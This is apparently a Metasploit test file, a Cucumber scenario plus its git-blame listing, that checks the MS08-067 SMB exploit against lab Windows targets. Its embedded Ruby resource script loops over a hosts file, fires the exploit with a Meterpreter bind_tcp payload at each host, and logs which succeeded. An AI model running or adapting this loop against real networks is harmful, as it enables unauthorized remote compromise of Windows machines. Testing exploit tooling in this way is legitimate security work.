features/modules/exploit/smb/ms08_067_netapi.feature

@targets @db
Feature: MS08-067 netapi

  Background:
    Given a directory named "home"
    And I cd to "home"
    And a mocked home directory

  Scenario: The MS08-067 should get a session with bind_tcp
    Given I ready the windows targets
    Given a file named "ms08-067-bind.rc" with:
      """
      <ruby>
      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
      payload_name    = 'windows/meterpreter/bind_tcp'
      exploited_hosts = []
      failed_hosts    = []

      hosts.each do |host|
        print_status("Trying MS08-067 against #{host['ipAddress']}")
        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
        mod.datastore['PAYLOAD'] = payload_name
        mod.datastore['RHOST'] = host['ipAddress']
        m = mod.exploit_simple(
          'LocalInput'  => nil,
          'LocalOutput' => nil,
          'Payload'     => payload_name,
          'RunAsJob'    => false
        )

        sleep(1)

        if m
          exploited_hosts << host['ipAddress']
        else
          failed_hosts << host['ipAddress']
        end
      end

      print_status("Exploited hosts: #{exploited_hosts.inspect}")
      print_status("Failed hosts: #{failed_hosts.inspect}")
      self.run_single('sessions -K')
      </ruby>
      """
    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
    Then the 'Mdm::Host' table contains the expected targets
Support for tests that require the DB. Also update ms08-067 script with a few flags. 2016-02-25 12:41:40 -06:00			`@targets @db`
moving the scenarios around 2014-08-13 16:54:29 -05:00			`Feature: MS08-067 netapi`
adding more scenarios 2014-08-19 15:06:47 -05:00
updating how we use cucumber to match lukes changes 2014-09-02 18:57:55 -05:00			`Background:`
removing unused step files 2014-09-11 16:51:49 -05:00			`Given a directory named "home"`
			`And I cd to "home"`
			`And a mocked home directory`
Force msfconsole to use stdlib's readline with -L 2014-10-29 13:21:31 -05:00
working on automated testing of 08-067 2015-12-30 14:57:41 -06:00			`Scenario: The MS08-067 should get a session with bind_tcp`
			`Given I ready the windows targets`
updating ms08067 2016-02-04 13:37:36 -06:00			`Given a file named "ms08-067-bind.rc" with:`
removing unused step files 2014-09-11 16:51:49 -05:00			`"""`
This is a combination of 5 commits. 2016-07-27 12:18:02 -05:00			`<ruby>`
			`self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")`
			`hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')`
			`payload_name = 'windows/meterpreter/bind_tcp'`
			`exploited_hosts = []`
			`failed_hosts = []`

			`hosts.each do \|host\|`
			`print_status("Trying MS08-067 against #{host['ipAddress']}")`
			`mod = framework.exploits.create('windows/smb/ms08_067_netapi')`
			`mod.datastore['PAYLOAD'] = payload_name`
			`mod.datastore['RHOST'] = host['ipAddress']`
			`m = mod.exploit_simple(`
			`'LocalInput' => nil,`
			`'LocalOutput' => nil,`
			`'Payload' => payload_name,`
			`'RunAsJob' => false`
			`)`

			`sleep(1)`

			`if m`
			`exploited_hosts << host['ipAddress']`
			`else`
			`failed_hosts << host['ipAddress']`
			`end`
			`end`

			`print_status("Exploited hosts: #{exploited_hosts.inspect}")`
			`print_status("Failed hosts: #{failed_hosts.inspect}")`
			`self.run_single('sessions -K')`
			`</ruby>`
removing unused step files 2014-09-11 16:51:49 -05:00			`"""`
This is a combination of 5 commits. 2016-07-27 12:18:02 -05:00			When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
Use the correct step definition. 2016-02-25 13:26:11 -06:00			`Then the 'Mdm::Host' table contains the expected targets`
updating ms08067 2016-02-04 13:37:36 -06:00